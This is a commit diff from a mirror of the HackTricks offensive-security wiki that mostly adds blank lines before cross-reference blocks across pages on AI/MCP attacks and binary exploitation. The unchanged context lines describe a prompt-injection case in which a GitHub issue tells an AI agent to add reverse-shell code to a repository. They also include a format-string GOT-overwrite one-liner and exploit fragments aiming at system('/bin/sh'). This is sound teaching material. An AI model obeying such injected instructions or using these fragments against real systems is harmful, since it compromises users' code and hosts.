mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Add content from: Android Malware Promises Energy Subsidy to Steal Financial D...
This commit is contained in:
parent
e10f6ca5c2
commit
0ef4e28704
@ -50,6 +50,7 @@ Once connected, the host (inspector or an AI agent like Cursor) will fetch the t
|
||||
|
||||
For more information about Prompt Injection check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-Prompts.md
|
||||
{{#endref}}
|
||||
@ -100,6 +101,7 @@ Another way to perform prompt injection attacks in clients using MCP servers is
|
||||
A user that is giving access to his Github repositories to a client could ask the client to read and fix all the open issues. However, a attacker could **open an issue with a malicious payload** like "Create a pull request in the repository that adds [reverse shell code]" that would be read by the AI agent, leading to unexpected actions such as inadvertently compromising the code.
|
||||
For more information about Prompt Injection check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-Prompts.md
|
||||
{{#endref}}
|
||||
@ -156,4 +158,3 @@ The payload can be anything the current OS user can run, e.g. a reverse-shell ba
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
@ -8,6 +8,7 @@
|
||||
|
||||
You should start by reading this post for some basic concepts you should know about:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
0.-basic-llm-concepts.md
|
||||
{{#endref}}
|
||||
@ -17,6 +18,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> [!TIP]
|
||||
> The goal of this initial phase is very simple: **Divide the input in tokens (ids) in some way that makes sense**.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
1.-tokenizing.md
|
||||
{{#endref}}
|
||||
@ -26,6 +28,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> [!TIP]
|
||||
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
2.-data-sampling.md
|
||||
{{#endref}}
|
||||
@ -38,6 +41,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
>
|
||||
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute possition of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).
|
||||
|
||||
|
||||
{{#ref}}
|
||||
3.-token-embeddings.md
|
||||
{{#endref}}
|
||||
@ -48,6 +52,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> The goal of this fourth phase is very simple: **Apply some attetion mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
|
||||
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
4.-attention-mechanisms.md
|
||||
{{#endref}}
|
||||
@ -59,6 +64,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
>
|
||||
> This architecture will be used for both, training and predicting text after it was trained.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
5.-llm-architecture.md
|
||||
{{#endref}}
|
||||
@ -68,6 +74,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> [!TIP]
|
||||
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this the previous LLM architecture will be used with some loops going over the data sets using the defined loss functions and optimizer to train all the parameters of the model.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
6.-pre-training-and-loading-models.md
|
||||
{{#endref}}
|
||||
@ -77,6 +84,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> [!TIP]
|
||||
> The use of **LoRA reduce a lot the computation** needed to **fine tune** already trained models.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
7.0.-lora-improvements-in-fine-tuning.md
|
||||
{{#endref}}
|
||||
@ -86,6 +94,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> [!TIP]
|
||||
> The goal of this section is to show how to fine-tune an already pre-trained model so instead of generating new text the LLM will select give the **probabilities of the given text being categorized in each of the given categories** (like if a text is spam or not).
|
||||
|
||||
|
||||
{{#ref}}
|
||||
7.1.-fine-tuning-for-classification.md
|
||||
{{#endref}}
|
||||
@ -95,6 +104,7 @@ You should start by reading this post for some basic concepts you should know ab
|
||||
> [!TIP]
|
||||
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
7.2.-fine-tuning-to-follow-instructions.md
|
||||
{{#endref}}
|
||||
|
@ -6,18 +6,22 @@
|
||||
|
||||
The best starting point to learn about AI is to understand how the main machine learning algorithms work. This will help you to understand how AI works, how to use it and how to attack it:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
./AI-Supervised-Learning-Algorithms.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
./AI-Unsupervised-Learning-Algorithms.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
./AI-Reinforcement-Learning-Algorithms.md
|
||||
{{#endref}}
|
||||
|
||||
|
||||
{{#ref}}
|
||||
./AI-Deep-Learning.md
|
||||
{{#endref}}
|
||||
@ -26,6 +30,7 @@ The best starting point to learn about AI is to understand how the main machine
|
||||
|
||||
In the following page you will find the basics of each component to build a basic LLM using transformers:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-llm-architecture/README.md
|
||||
{{#endref}}
|
||||
@ -36,6 +41,7 @@ AI-llm-architecture/README.md
|
||||
|
||||
At this moment, the main 2 frameworks to assess the risks of AI systems are the OWASP ML Top 10 and the Google SAIF:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-Risk-Frameworks.md
|
||||
{{#endref}}
|
||||
@ -44,6 +50,7 @@ AI-Risk-Frameworks.md
|
||||
|
||||
LLMs have made the use of AI explode in the last years, but they are not perfect and can be tricked by adversarial prompts. This is a very important topic to understand how to use AI safely and how to attack it:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-Prompts.md
|
||||
{{#endref}}
|
||||
@ -52,6 +59,7 @@ AI-Prompts.md
|
||||
|
||||
It's very common to developers and companies to run models downloaded from the Internet, however just loading a model might be enough to execute arbitrary code on the system. This is a very important topic to understand how to use AI safely and how to attack it:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-Models-RCE.md
|
||||
{{#endref}}
|
||||
@ -60,12 +68,14 @@ AI-Models-RCE.md
|
||||
|
||||
MCP (Model Context Protocol) is a protocol that allows AI agent clients to connect with external tools and data sources in a plug-and-play fashion. This enables complex workflows and interactions between AI models and external systems:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-MCP-Servers.md
|
||||
{{#endref}}
|
||||
|
||||
### AI-Assisted Fuzzing & Automated Vulnerability Discovery
|
||||
|
||||
|
||||
{{#ref}}
|
||||
AI-Assisted-Fuzzing-and-Vulnerability-Discovery.md
|
||||
{{#endref}}
|
||||
|
@ -10,6 +10,7 @@ To call malloc it's possible to wait for the program to call it or by **calling
|
||||
|
||||
More info about One Gadget in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-return-oriented-programing/ret2lib/one-gadget.md
|
||||
{{#endref}}
|
||||
@ -21,6 +22,7 @@ More info about One Gadget in:
|
||||
|
||||
This was abused in one of the example from the page abusing a fast bin attack after having abused an unsorted bin attack:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../libc-heap/unsorted-bin-attack.md
|
||||
{{#endref}}
|
||||
|
@ -62,6 +62,7 @@ Moreover, if `puts` is used with user input, it's possible to overwrite the `str
|
||||
|
||||
## **One Gadget**
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-return-oriented-programing/ret2lib/one-gadget.md
|
||||
{{#endref}}
|
||||
@ -77,6 +78,7 @@ It's possible to find an [**example here**](https://ctf-wiki.mahaloz.re/pwn/linu
|
||||
|
||||
The **Full RELRO** protection is meant to protect agains this kind of technique by resolving all the addresses of the functions when the binary is started and making the **GOT table read only** after it:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../common-binary-protections-and-bypasses/relro.md
|
||||
{{#endref}}
|
||||
@ -89,4 +91,3 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,12 +6,14 @@
|
||||
|
||||
Before start exploiting anything it's interesting to understand part of the structure of an **ELF binary**:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
elf-tricks.md
|
||||
{{#endref}}
|
||||
|
||||
## Exploiting Tools
|
||||
|
||||
|
||||
{{#ref}}
|
||||
tools/
|
||||
{{#endref}}
|
||||
@ -34,6 +36,7 @@ There are different was you could end controlling the flow of a program:
|
||||
|
||||
You can find the **Write What Where to Execution** techniques in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../arbitrary-write-2-exec/
|
||||
{{#endref}}
|
||||
@ -111,4 +114,3 @@ Something to take into account is that usually **just one exploitation of a vuln
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -68,6 +68,7 @@ This stores vendor metadata information about the binary.
|
||||
|
||||
- On x86-64, `readelf -n` will show `GNU_PROPERTY_X86_FEATURE_1_*` flags inside `.note.gnu.property`. If you see `IBT` and/or `SHSTK`, the binary was built with CET (Indirect Branch Tracking and/or Shadow Stack). This impacts ROP/JOP because indirect branch targets must start with an `ENDBR64` instruction and returns are checked against a shadow stack. See the CET page for details and bypass notes.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../common-binary-protections-and-bypasses/cet-and-shadow-stack.md
|
||||
{{#endref}}
|
||||
@ -92,6 +93,7 @@ Note that RELRO can be partial or full, the partial version do not protect the s
|
||||
|
||||
> For exploitation techniques and up-to-date bypass notes, check the dedicated page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../common-binary-protections-and-bypasses/relro.md
|
||||
{{#endref}}
|
||||
@ -372,7 +374,8 @@ So when a program calls to malloc, it actually calls the corresponding location
|
||||
|
||||
- `-z now` (Full RELRO) disables lazy binding; PLT entries still exist but GOT/PLT is mapped read-only, so techniques like **GOT overwrite** and **ret2dlresolve** won’t work against the main binary (libraries may still be partially RELRO). See:
|
||||
|
||||
{{#ref}}
|
||||
|
||||
{{#ref}}
|
||||
../common-binary-protections-and-bypasses/relro.md
|
||||
{{#endref}}
|
||||
|
||||
@ -382,6 +385,7 @@ So when a program calls to malloc, it actually calls the corresponding location
|
||||
|
||||
> If GOT/PLT is not an option, pivot to other writeable code-pointers or use classic ROP/SROP into libc.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../arbitrary-write-2-exec/aw2exec-got-plt.md
|
||||
{{#endref}}
|
||||
@ -432,6 +436,7 @@ Moreover, it's also possible to have a **`PREINIT_ARRAY`** with **pointers** tha
|
||||
|
||||
- For lazy binding abuse of the dynamic linker to resolve arbitrary symbols at runtime, see the dedicated page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-return-oriented-programing/ret2dlresolve.md
|
||||
{{#endref}}
|
||||
|
@ -210,6 +210,7 @@ p.interactive()
|
||||
|
||||
Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2plt.md
|
||||
{{#endref}}
|
||||
@ -231,6 +232,7 @@ payload += p32(elf.symbols['main'])
|
||||
|
||||
You can find more info about Format Strings arbitrary read in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../format-strings/
|
||||
{{#endref}}
|
||||
@ -239,6 +241,7 @@ You can find more info about Format Strings arbitrary read in:
|
||||
|
||||
Try to bypass ASLR abusing addresses inside the stack:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2ret.md
|
||||
{{#endref}}
|
||||
@ -297,6 +300,7 @@ gef➤ x/4i 0xffffffffff600800
|
||||
|
||||
Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../rop-return-oriented-programing/ret2vdso.md
|
||||
{{#endref}}
|
||||
@ -304,4 +308,3 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -19,6 +19,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary
|
||||
- Be **given** the leak (common in easy CTF challenges, [**check this example**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit))
|
||||
- **Brute-force EBP and EIP values** in the stack until you leak the correct ones:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bypassing-canary-and-pie.md
|
||||
{{#endref}}
|
||||
@ -32,4 +33,3 @@ bypassing-canary-and-pie.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -33,12 +33,14 @@ In `x86` binaries, the canary cookie is a **`0x4`** byte dword. The f**irst thre
|
||||
|
||||
- If the **canary is forked in child processes** it might be possible to **brute-force** it one byte at a time:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bf-forked-stack-canaries.md
|
||||
{{#endref}}
|
||||
|
||||
- If there is some interesting **leak or arbitrary read vulnerability** in the binary it might be possible to leak it:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
print-stack-canary.md
|
||||
{{#endref}}
|
||||
@ -47,6 +49,7 @@ print-stack-canary.md
|
||||
|
||||
The stack vulnerable to a stack overflow might **contain addresses to strings or functions that can be overwritten** in order to exploit the vulnerability without needing to reach the stack canary. Check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../stack-overflow/pointer-redirecting.md
|
||||
{{#endref}}
|
||||
@ -76,4 +79,3 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -23,6 +23,7 @@ Obviously, this tactic is very **restricted** as the attacker needs to be able t
|
||||
|
||||
With an **arbitrary read** like the one provided by format **strings** it might be possible to leak the canary. Check this example: [**https://ir0nstone.gitbook.io/notes/types/stack/canaries**](https://ir0nstone.gitbook.io/notes/types/stack/canaries) and you can read about abusing format strings to read arbitrary memory addresses in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../format-strings/
|
||||
{{#endref}}
|
||||
@ -33,4 +34,3 @@ With an **arbitrary read** like the one provided by format **strings** it might
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -168,6 +168,7 @@ Therefore, this vulnerability allows to **write anything in any address (arbitra
|
||||
|
||||
In this example, the goal is going to be to **overwrite** the **address** of a **function** in the **GOT** table that is going to be called later. Although this could abuse other arbitrary write to exec techniques:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../arbitrary-write-2-exec/
|
||||
{{#endref}}
|
||||
@ -196,6 +197,7 @@ python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "
|
||||
|
||||
You can find a **template** to prepare a exploit for this kind of vulnerability in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
format-strings-template.md
|
||||
{{#endref}}
|
||||
@ -241,4 +243,3 @@ It's possible to abuse the write actions of a format string vulnerability to **w
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -513,6 +513,7 @@ and inside of it some chunks can be found:
|
||||
|
||||
Check what are the bins and how are they organized and how memory is allocated and freed in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bins-and-memory-allocations.md
|
||||
{{#endref}}
|
||||
@ -521,6 +522,7 @@ bins-and-memory-allocations.md
|
||||
|
||||
Functions involved in heap will perform certain check before performing its actions to try to make sure the heap wasn't corrupted:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
heap-memory-functions/heap-functions-security-checks.md
|
||||
{{#endref}}
|
||||
|
@ -610,6 +610,7 @@ When malloc is used and a chunk is divided (from the unsorted bin or from the to
|
||||
|
||||
Check out:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
heap-memory-functions/malloc-and-sysmalloc.md
|
||||
{{#endref}}
|
||||
@ -618,6 +619,7 @@ heap-memory-functions/malloc-and-sysmalloc.md
|
||||
|
||||
Check out:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
heap-memory-functions/free.md
|
||||
{{#endref}}
|
||||
@ -626,6 +628,7 @@ heap-memory-functions/free.md
|
||||
|
||||
Check the security checks performed by heavily used functions in heap in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
heap-memory-functions/heap-functions-security-checks.md
|
||||
{{#endref}}
|
||||
@ -640,4 +643,3 @@ heap-memory-functions/heap-functions-security-checks.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
For more information about what is a fast bin check this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bins-and-memory-allocations.md
|
||||
{{#endref}}
|
||||
@ -146,6 +147,7 @@ int main(void)
|
||||
- Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
|
||||
- Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
unsorted-bin-attack.md
|
||||
{{#endref}}
|
||||
@ -153,4 +155,3 @@ unsorted-bin-attack.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
For more info check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
unlink.md
|
||||
{{#endref}}
|
||||
@ -23,6 +24,7 @@ This is a summary of the performed checks:
|
||||
|
||||
For more info check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
malloc-and-sysmalloc.md
|
||||
{{#endref}}
|
||||
@ -94,6 +96,7 @@ malloc-and-sysmalloc.md
|
||||
|
||||
For more info check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
free.md
|
||||
{{#endref}}
|
||||
@ -163,4 +166,3 @@ free.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -75,6 +75,7 @@ uint8_t* malloc_hook_chunk = malloc(0x60);
|
||||
|
||||
For more info you can check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
unsorted-bin-attack.md
|
||||
{{#endref}}
|
||||
@ -118,4 +119,3 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
For more information about what is a large bin check this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bins-and-memory-allocations.md
|
||||
{{#endref}}
|
||||
@ -58,4 +59,3 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
For more information about what is a Tcache bin check this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bins-and-memory-allocations.md
|
||||
{{#endref}}
|
||||
@ -47,4 +48,3 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
|
||||
For more information about what is an unsorted bin check this page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
bins-and-memory-allocations.md
|
||||
{{#endref}}
|
||||
@ -73,4 +74,3 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -13,6 +13,7 @@ The problem here is that it's not ilegal (there **won't be errors**) when a **fr
|
||||
A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\
|
||||
Check more info in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
first-fit.md
|
||||
{{#endref}}
|
||||
@ -20,4 +21,3 @@ first-fit.md
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -152,6 +152,7 @@ In this example:
|
||||
|
||||
Check the following page for this information:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -168,18 +169,21 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in
|
||||
|
||||
- **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2lib/
|
||||
{{#endref}}
|
||||
|
||||
- **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands.
|
||||
|
||||
|
||||
{{#ref}}
|
||||
rop-syscall-execv/
|
||||
{{#endref}}
|
||||
|
||||
- **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP).
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
|
||||
{{#endref}}
|
||||
@ -195,4 +199,3 @@ rop-syscall-execv/
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -79,6 +79,7 @@ Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by acc
|
||||
|
||||
Check this page for more info:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
brop-blind-return-oriented-programming.md
|
||||
{{#endref}}
|
||||
@ -184,4 +185,3 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -17,6 +17,7 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
|
||||
|
||||
Chek this video for a nice explanation about this technique in the second half of the video:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://youtu.be/ADULSwnQs-s?feature=shared
|
||||
{{#endref}}
|
||||
@ -197,4 +198,3 @@ target.interactive()
|
||||
- 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -61,12 +61,14 @@ In this case it is loaded in **0xb75dc000** (This will be the base address of li
|
||||
|
||||
It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
rop-leaking-libc-address/
|
||||
{{#endref}}
|
||||
|
||||
And you can find a pwntools template for this in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
rop-leaking-libc-address/rop-leaking-libc-template.md
|
||||
{{#endref}}
|
||||
@ -91,6 +93,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||
|
||||
Execute a shell just jumping to **one** specific **address** in libc:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
one-gadget.md
|
||||
{{#endref}}
|
||||
@ -119,6 +122,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000):
|
||||
|
||||
Check the example from:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../
|
||||
{{#endref}}
|
||||
@ -131,6 +135,7 @@ Also in ARM64 an instruction does what the instruction does (it's not possible t
|
||||
|
||||
Check the example from:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2lib-+-printf-leak-arm64.md
|
||||
{{#endref}}
|
||||
@ -143,6 +148,7 @@ This allows to **leak information from the process** by calling `printf`/`puts`
|
||||
|
||||
This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible):
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../format-strings/
|
||||
{{#endref}}
|
||||
@ -165,4 +171,3 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -38,6 +38,7 @@ gcc -o vuln vuln.c -fno-stack-protector -no-pie
|
||||
|
||||
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
rop-leaking-libc-template.md
|
||||
{{#endref}}
|
||||
@ -265,6 +266,7 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100
|
||||
|
||||
You can find a template to exploit this vulnerability here:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
rop-leaking-libc-template.md
|
||||
{{#endref}}
|
||||
@ -304,4 +306,3 @@ BINSH = next(libc.search("/bin/sh")) - 64
|
||||
{{#include ../../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -62,6 +62,7 @@ pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd
|
||||
|
||||
After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
srop-sigreturn-oriented-programming/srop-arm64.md
|
||||
{{#endref}}
|
||||
@ -69,4 +70,3 @@ srop-sigreturn-oriented-programming/srop-arm64.md
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -110,6 +110,7 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
|
||||
|
||||
If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../srop-sigreturn-oriented-programming/
|
||||
{{#endref}}
|
||||
@ -195,4 +196,3 @@ target.interactive()
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -4,6 +4,7 @@
|
||||
|
||||
Find an introduction to arm64 in:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
|
||||
{{#endref}}
|
||||
@ -12,6 +13,7 @@ Find an introduction to arm64 in:
|
||||
|
||||
We are going to use the example from the page:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../stack-overflow/ret2win/ret2win-arm64.md
|
||||
{{#endref}}
|
||||
@ -128,4 +130,3 @@ p.interactive()
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
|
||||
|
@ -15,6 +15,7 @@ The interesting part is how **`sigreturn`** restores the program's state: it doe
|
||||
|
||||
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-syscall-execv/
|
||||
{{#endref}}
|
||||
@ -59,6 +60,7 @@ If you are curious this is the **sigcontext structure** stored in the stack to l
|
||||
|
||||
For a better explanation check also:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
https://youtu.be/ADULSwnQs-s?feature=shared
|
||||
{{#endref}}
|
||||
@ -145,4 +147,3 @@ target.interactive()
|
||||
- SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -179,12 +179,14 @@ p.interactive()
|
||||
|
||||
For more info about vdso check:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../ret2vdso.md
|
||||
{{#endref}}
|
||||
|
||||
And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../../common-binary-protections-and-bypasses/aslr/
|
||||
{{#endref}}
|
||||
|
@ -65,6 +65,7 @@ However, in other scenarios maybe just **overwriting some variables values in th
|
||||
|
||||
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2win/
|
||||
{{#endref}}
|
||||
@ -73,6 +74,7 @@ ret2win/
|
||||
|
||||
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
stack-shellcode/
|
||||
{{#endref}}
|
||||
@ -81,6 +83,7 @@ stack-shellcode/
|
||||
|
||||
This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
../rop-return-oriented-programing/
|
||||
{{#endref}}
|
||||
@ -89,6 +92,7 @@ This technique is the fundamental framework to bypass the main protection to the
|
||||
|
||||
